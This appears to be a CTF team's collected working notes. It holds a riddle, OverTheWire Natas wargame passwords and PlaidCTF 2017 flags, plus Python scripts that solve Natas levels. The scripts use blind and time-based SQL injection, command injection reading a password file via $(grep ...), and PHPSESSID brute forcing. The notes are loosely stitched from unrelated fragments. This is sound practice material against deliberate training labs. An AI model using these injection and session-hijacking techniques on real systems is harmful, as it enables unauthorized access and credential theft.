irc channel: hackint.org #ccchh-ctf Current challenge: "Drink me!" - http://3564020356.org/showresource.php3?sid=bdbd99fdbf40e237605c451b1b76811b&resid=4 10 11 09 12 08 13 14 05 15 07 16 02 04 03 17 06 01 var[10] + var[11] + var[9] + var[12] + var[8] + var[13] + var[14] + var[5] + var[15] + var[7] + var[16] + var[2] + var[4] + var[3] + var[17] + var[6] + var[1] var[17] + var[12] + var[14] + var[13] + var[8] + var[16] + var[10] + var[5] + var[3] + var[1] + var[2] + var[4] + var[6] + var[7] + var[9] + var[11] + var[15] pitssasto cS lLdi coSt lsLsdistiap iSl td stpisasocL Riddle 02: Alice in Wonderland. Have you ever read "Alice in Wonderland", my friend? Well, you should. This is not completely related to this riddle, but I'm sure you would learn something from it: at least, it contains many hints about adventures. Which adventures am I speaking about? Text adventures, the best ones. At least, in my opinion: I swear, _THOSE_ were riddles. For instance, a classic which you can find in textual adventures is the trick of the bottle/the food: as in "Alice in Wonderland", you can grow bigger or become smaller eating or drinking something and this can help you, for instance, if you want to enter a door which is too small for you or if you want to reach a place which is too high! If you are interested in this kind of games I'll give you some hints. Search, for instance, with the keywords "text adventures" or, if you are interested in other kinds of "old" software, just try with "abandonwares" or "abandonwarez"; also, searching for "Infocom" and "Scott Adam" would not be a bad choice. Why am I speaking about all this stuff? Well, as you should know (but probably you do not ;) preparing a riddle is not easy. It requires time and effort, and sometimes it even requires more words than the ones you are used to write. All starts with a simple idea: you want to take your readers somewhere, to a place you've decided yet, to a conclusion that you think is obvious because you start from that and then "backtrack" from it to the first question (or questions, some times). But often this kind of backtracking is not easy at all, my friend. I'm afraid that this time the riddle will be far too easy. At least, easier than I'd like (anyway I'll soon discover it, just by giving a look at the users' db): don't worry anyway, next one will be harder. What do you have to do to solve this riddle? Trivial, you just have to find another password I have hidden somewhere in this page. I found this riddle easy because in my opinion there are many, many ways you can work to find the answer. So, this time I'll try to avoid giving you hints: but I'm sure you will be able to solve it anyway,my friend. The only things that you have here are this text, the picture you can see above it (at least I hope you can see it, i think it could be helpful) and a detail of this picture, which is contained in a zip file you can download just by clicking on the picture itself: study them, and the solution will be as easy as just connecting the clues you have found. curl 'http://2016.zeromutarts.de:81/admin.php?include=admin_home' -H 'Cookie: PHPSESSID=unm458jbeprvsbhq13jrrig2v7' -H 'Origin: http://2016.zeromutarts.de:81' -H 'Content-Type: application/x-www-form-urlencoded' --data 'user=sadfdsf&password=sdfdf' -v Web-Challenge "Natas": Natas: ( /etc/natas_webpass/natasXY) 4: Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ 5: iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq 6: aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1 7: 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9 8: DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe 9: W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl 10: nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu 11: U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK 12: EDXp0pS26wLKHZy1rDBPUZk0RKfLGIR3 13: jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY 14: Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1 15: AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J 16: WaIHEacj63wnNIBROHeqi3p9t0m5nhmh 17: 8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw 18: xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP 19: 4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs " or 1 or "1" = "1 http://overthewire.org/wargames/natas/natas16.html <------- hier gehts weiter import requests alphabet = [] # for a in 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789': # r = requests.post("http://natas15:AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J@natas15.natas.labs.overthewire.org/", data={'username': '''natas16" and password like binary '%%%s%%' and "1" = "1''' % a}) # if 'user exists' in r.content: # print a # alphabet += a # print alphabet # print len(alphabet) s = requests.Session() pw = '' while True: for a in ['a', 'c', 'e', 'h', 'i', 'j', 'm', 'n', 'p', 'q', 't', 'w', 'B', 'E', 'H', 'I', 'N', 'O', 'R', 'W', '0', '3', '5', '6', '9']: print pw + a r = s.post("http://natas15:AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J@natas15.natas.labs.overthewire.org/", data={'username': '''natas16" and password like binary '%s%%' and "1" = "1''' % (pw + a)}) if 'user exists' in r.content: pw += a print "!", pw break def get_alphabet(): * alphabet = [] * for a in 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789': * r = requests.post("http://natas16:WaIHEacj63wnNIBROHeqi3p9t0m5nhmh@natas16.natas.labs.overthewire.org/", * data={'needle': '$(grep %s /etc/natas_webpass/natas17)Africans' % a}) * if 'Africans' not in r.content: * print "Found %s" % a * alphabet += a * * print alphabet * print len(alphabet) Ergebnis ['b', 'c', 'd', 'g', 'h', 'k', 'm', 'n', 'q', 'r', 's', 'w', 'A', 'G', 'H', 'N', 'P', 'Q', 'S', 'W', '0', '3', '5', '7', '8', '9'] ['b', 'c', 'd', 'g', 'h', 'k', 'm', 'n', 'q', 'r', 's', 'w', 'A', 'G', 'H', 'N', 'P', 'Q', 'S', 'W', '0', '3', '5', '7', '8', '9'] 26 $(grep bn5rd9S7GmAdgQNdkhPkq9cw /etc/natas_webpass/natas17)Africans *Zu: 17: *#!/usr/bin/env python3 *# -*- coding: utf-8 -*- * *import requests * *url = "http://natas17:8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw@natas17.natas.labs.overthewire.org/" * *def get_alphabet(): * alphabet = [] * for a in 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789': * r = requests.post(url, data={'username': '''natas18" and password like binary '%%%s%%' and sleep(2) and "1" = "1''' % a}) * if r.elapsed.seconds >= 2: * print("Found %s" % a) * alphabet += a * * print(alphabet) * print(len(alphabet)) * * *def brute_force(): * s = requests.Session() * * pw = '' * run = True * while run: * run = False * for a in ['d', 'g', 'h', 'j', 'l', 'm', 'p', 'q', 's', 'v', 'w', 'x', 'y', 'C', 'D', 'F', 'I', 'K', 'O', 'P', 'R', '0', '4', '7']: * print(pw + a) * r = s.post(url, data={'username': '''natas18" and password like binary '%s%%' and sleep(2) and "1" = "1''' % (pw + a)}) * if r.elapsed.seconds >= 2: * run = True * pw += a * print("! %s" % pw) * break * * *# get_alphabet() *brute_force() *18: *#!/usr/bin/env python3 *# -*- coding: utf-8 -*- * *import requests * *url = "http://natas18:xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP@natas18.natas.labs.overthewire.org/" * *s = requests.Session() *for i in range(640): * r = s.get(url, cookies = { * 'PHPSESSID': '%s' % i * }) * * print("testing %i" % i) * if b"You are an admin" in r.content: * print("Id: %s\n%s" % (i, r.content)) a - 3431312d61 a - 3530392d61 a - 322d61 a - 3539392d61 b - 3338382d62 b - 39362d62 b - 32372d62 *PCTF2017 https://play.plaidctf.com/ *Keys: 1. sanity check: PCTF{poop} 2. logarithms are hard: PCTF{} 3. Multicast: PCTF{} 4. no_mo_flo: PCTF{} 5. zipper: PCTF{} 6. gameboy: PCTF{} 7. scriptabble: PCTF{} 8. BB-8: PCTF{} 9. Echo: PCTF{} 10. Common: PCTF{} 11. bigpicture: PCTF{} 12. zamboni: PCTF{} 13. terebeep: PCTF{} 14. Chakrazy: PCTF{} 15. Pykemon: PCTF{N0t_4_sh1ny_M4g1k4rp} 16. definitely maybe: PCTF{}